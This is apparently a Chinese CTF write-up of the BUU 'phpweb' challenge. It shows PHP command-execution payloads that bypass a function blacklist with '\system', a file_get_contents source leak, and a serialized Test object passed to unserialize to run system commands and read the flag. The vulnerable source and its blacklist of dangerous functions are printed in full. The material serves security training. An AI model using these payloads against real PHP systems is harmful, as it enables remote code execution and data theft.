BUU [网鼎杯 2020 朱雀组]phpweb

Jay 172023-07-30 15:33

BUU [网鼎杯 2020 朱雀组]phpweb

众生皆懒狗。打开题目,只有一个报错,不知何从下手。

翻译一下报错,data()函数:,还是没有头绪,中国有句古话说的好"遇事不决抓个包"

抓个包果然有东西,仔细一看这不就分别是函数和参数吗,试一下别的,从报错发现和函数call_user_func()有关系。

试一下命令执行有过滤,难办,那还是得办。从这里开始分为两种方法了。

法一:

绕过过滤:

\system("ls");

\system可以绕过黑名单的原因:php内的" \ "在做代码执行的时候,会识别特殊字符串。

Payload:func=\system&p=tac $(find / -name fla*)

一步到位。

法二:

利用file_get_contents获取index.php的源码,

func=file_get_contents&p=index.php

源码如下

php 复制代码 
  <?php

  $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");

  function gettime($func, $p) {
​    $result = call_user_func($func, $p);
​    $a= gettype($result);
​    if ($a == "string") {
​      return $result;
​    } else {return "";}
  }
  
  class Test {
​    var $p = "Y-m-d h:i:s a";
​    var $func = "date";
​    function __destruct() {
​      if ($this->func != "") {
​        echo gettime($this->func, $this->p);
​      }
​    }
  }
  
  $func = $_REQUEST["func"];
  $p = $_REQUEST["p"];
  if ($func != null) {
​    $func = strtolower($func);
​    if (!in_array($func,$disable_fun)) {
​      echo gettime($func, $p);
​    }else {
​      die("Hacker...");
​    }
  }
  ?>

妈呀过滤的真多,麻了,幸好没有去一个一个测试。

分析一下代码,是存在反序列化漏洞的。我们可以传进去 f u n c = u n s e r i a l i z e , func=unserialize, func=unserialize,p=序列化后的字符串。可以序列化Text类,其中var p = "tac (find / -name fla*)";var $func = "system";【注意这里的类里面的func和p与传进去的不一样,不需要进行过滤】,貌似反序列化的题经常喜欢拿名字一样的两个东西来混淆视听,这个应该是考察我们对序列化和代码的理解能力。

构造exp

Payload:

复制代码 
func=unserialize&p=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A24%3A%22tac+%24%28find+%2F+-name+fla%2A%29%22%3Bs%3A4%3A%22func%22%3Bs%3A6%3A%22system%22%3B%7D

(这里应该是可以不url编码直接传字符串的)

也可以是Payload:

func=unserialize&p=O:4:"Test":2:{s:1:"p";s:24:"tac $(find / -name fla*)";s:4:"func";s:6:"system";}

补充法:

好像也可以利用highlight_file或者show_source获取index.php的源码,做法和法二一样。

相关推荐
X7x52 小时前
筑牢网络安全防线:Web应用防火墙(WAF)全面解析
web安全·网络安全·安全架构·waf
Chengbei116 小时前
AI大模型网关存在SQL注入、影响版本LiteLLM 1.81.16~1.83.7(CVE-2026-42208)
数据库·人工智能·sql·安全·web安全·网络安全·系统安全
HackTwoHub9 小时前
开源AI渗透测试的终极形态,让渗透测试进入“自动驾驶“时代、让渗透测试全自动!
人工智能·web安全·网络安全·开源·系统安全·安全架构·sql注入
Chockmans9 小时前
春秋云境CVE-2021-3019
安全·web安全·网络安全·网络攻击模型·安全威胁分析·春秋云境·cve-2021-3019
@insist1231 天前
信息安全-防火墙技术演进全景:从代理NAT 到下一代及专项防火墙
网络·安全·web安全·软考·信息安全工程师·软件水平考试
Chockmans1 天前
春秋云境CVE-2017-3506
安全·web安全·网络安全·系统安全·安全威胁分析·春秋云境·cve-2017-3506
Chengbei111 天前
轻量化 Web 安全日志分析神器 星川智盾日志威胁检测、地理溯源、MITRE ATT&CK 映射,支持 Windows/macOS/Linux
前端·人工智能·安全·web安全·macos·系统安全·安全架构
代码飞天1 天前
CTF之内存取证——瞬息万变成为一瞬
安全·web安全·缓存
探索者011 天前
文件上传漏洞指南:原理+绕过手法与靶场实战
安全·web安全·文件上传
捉鸭子2 天前
某音a_bogus vmp逆向
爬虫·python·web安全·node.js·js
热门推荐
01要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法02GitHub 镜像站点03Codex 接入 DeepSeek API 完整配置文档04【AI】2026 年具身智能模型和世界模型总结05裂开!ChatGPT 居然开始要手机号验证,附详细解决方法06零基础教你claude code 接入 deepseek V4072026年AI前瞻:量子AI、具身智能与科学发现的新纪元08CC-Switch & Claude 基于 Linux 服务器安装使用指南09在Windows 11上安装Docker的踩坑记录10CVE-2026-31431 (Copy Fail) 漏洞复现与验证记录